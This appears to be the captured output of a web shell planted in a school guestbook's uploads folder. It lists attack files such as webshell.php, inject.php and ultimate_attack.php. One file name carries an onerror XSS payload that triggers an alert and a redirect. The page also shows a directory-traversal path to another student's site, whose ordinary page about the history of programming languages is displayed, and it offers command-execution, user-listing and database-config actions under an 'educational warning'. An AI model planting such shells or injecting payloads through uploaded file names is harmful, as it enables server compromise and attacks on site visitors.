🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../589045.klas4s23.mid-ica.nl/public_html/technowire/programming-languages.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Technowire - ICT Geschiedenis</title>
</head>

<body>

    <div class="header">
    </div>

    <div class="navbar">
        <ul>
            <li><a href="index.html">Home</a></li>
            <li><a href="hall-of-fame.html">Hall of Fame</a></li>
            <li><a href="programming-languages.html">Programming languages</a></li>
            <li><a href="silicon-valley.html">Silicon valley</a></li>
        </ul>
    </div>

    <div class="timeline">
        <div class="container right">
            <div class="content">
                <h2>Machinecode (1940s-1950s)</h2>
                <img src="img/machinecode.webp" alt="Machinecode Image">
                <p>Year: 1940s-1950s</p>
                <p>Developer(s): N/A</p>
                <p>Specific Characteristics: Machine code represents the very first programming language ever created.
                    It consists of binary instructions understood by computers without any intermediate translation.
                    Each command corresponds to a specific operation on the hardware, making it the most primitive form
                    of programming.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Assembly Language (1950s)</h2>
                <img src="img/ASM.png" alt="Assembly Language Image">
                <p>Year: 1950s</p>
                <p>Developer(s): Various</p>
                <p>Specific Characteristics: Assembly Language is a low-level language that directly communicates with
                    computer hardware. It uses symbolic representations of machine code instructions, making it easier
                    for programmers to understand and communicate with the hardware. This language is often used for
                    programming on a specific architecture.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Fortran (1957)</h2>
                <img src="img/fortran.png" alt="Fortran Image">
                <p>Year: 1957</p>
                <p>Developer(s): John Backus</p>
                <p>Specific Characteristics: Fortran, short for "Formula Translation," was the first higher-level
                    programming language ever developed. It was specifically designed for scientific and technical
                    computations and introduced concepts such as arrays and loops, making complex calculations easier to
                    perform.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Lisp (1958)</h2>
                <img src="img/lisp.png" alt="Lisp Image">
                <p>Year: 1958</p>
                <p>Developer(s): John McCarthy</p>
                <p>Specific Characteristics: Lisp is known for its focus on symbolic processing and early development in
                    artificial intelligence (AI). It supports recursion and has powerful list processing capabilities,
                    making it well-suited for symbolic manipulation and the creation of AI algorithms.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>COBOL (1959)</h2>
                <img src="img/cobol.png" alt="COBOL Image">
                <p>Year: 1959</p>
                <p>Developer(s): Grace Hopper, ANSI</p>
                <p>Specific Characteristics: COBOL, which stands for "Common Business-Oriented Language," was designed
                    for business applications. It is still in use in financial systems and other business-critical
                    software due to its emphasis on readability and comprehensibility.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>BASIC (1964)</h2>
                <img src="img/basic.jpg" alt="BASIC Image">
                <p>Year: 1964</p>
                <p>Developer(s): John G. Kemeny, Thomas E. Kurtz</p>
                <p>Specific Characteristics: BASIC, an acronym for "Beginner's All-purpose Symbolic Instruction Code,"
                    was created to make programming accessible to beginners. It has a simple syntax and is often used in
                    education and for creating simple programs.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>C (1972)</h2>
                <img src="img/c.png" alt="C Image">
                <p>Year: 1972</p>
                <p>Developer(s): Dennis Ritchie</p>
                <p>Specific Characteristics: C has been influential in system software development due to its efficiency
                    and portability. It provides a powerful set of features and is often used for writing operating
                    systems and embedded software.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>C++ (1983)</h2>
                <img src="img/c++.png" alt="C++ Image">
                <p>Year: 1983</p>
                <p>Developer(s): Bjarne Stroustrup</p>
                <p>Specific Characteristics: C++ is an extension of C with object-oriented capabilities. This allows
                    programmers to build complex software using objects and classes, and it is popular in game
                    development and system software.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Java (1995)</h2>
                <img src="img/java.png" alt="Java Image">
                <p>Year: 1995</p>
                <p>Developer(s): James Gosling, Sun Microsystems</p>
                <p>Specific Characteristics: Java was designed for platform-independent development, allowing the same
                    code to run on different operating systems. It is often used for web and mobile applications.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Python (1991)</h2>
                <img src="img/python.png" alt="Python Image">
                <p>Year: 1991</p>
                <p>Developer(s): Guido van Rossum</p>
                <p>Specific Characteristics: Python is known for its readability and simple syntax, making it an
                    excellent choice for beginners. It is versatile and has a broad community support, contributing to
                    its popularity.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>JavaScript (1995)</h2>
                <img src="img/js.webp" alt="JavaScript Image">
                <p>Year: 1995</p>
                <p>Developer(s): Netscape Communications Corporation</p>
                <p>Specific Characteristics: JavaScript is the standard language for web development, allowing
                    developers to create interactive web pages. It runs in the browser and provides dynamic
                    functionality.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Ruby (1995)</h2>
                <img src="img/ruby.png" alt="Ruby Image">
                <p>Year: 1995</p>
                <p>Developer(s): Yukihiro Matsumoto (Matz)</p>
                <p>Specific Characteristics: Ruby is known for its elegance and productivity. It is popular for web
                    development and scripting and has a strong community of users and developers.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>PHP (1995)</h2>
                <img src="img/php.png" alt="PHP Image">
                <p>Year: 1995</p>
                <p>Developer(s): Rasmus Lerdorf</p>
                <p>Specific Characteristics: Originally designed for web development, PHP is widely used for creating
                    dynamic web pages. It is tightly integrated with web technologies such as databases and HTML.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>C# (2000)</h2>
                <img src="img/csharp.png" alt="C# Image">
                <p>Year: 2000</p>
                <p>Developer(s): Microsoft</p>
                <p>Specific Characteristics: C# was developed by Microsoft and is popular for Windows applications and
                    game development. It offers powerful capabilities for building desktop and server applications.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Go (Golang) (2009)</h2>
                <img src="img/go.png" alt="Go (Golang) Image">
                <p>Year: 2009</p>
                <p>Developer(s): Google</p>
                <p>Specific Characteristics: Go is designed for efficiency and scalability and is popular for web and
                    system development. It provides strong support for concurrency and simple language constructs.</p>
            </div>
        </div>

        <div class="container right">
            <div class="content">
                <h2>Rust (2010)</h2>
                <img src="img/rust.png" alt="Rust Image">
                <p>Year: 2010</p>
                <p>Developer(s): Mozilla Research</p>
                <p>Specific Characteristics: Rust is designed for system programming with a strong emphasis on safety
                    and performance. It offers features to prevent memory errors and data races.</p>
            </div>
        </div>
    </div>



</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!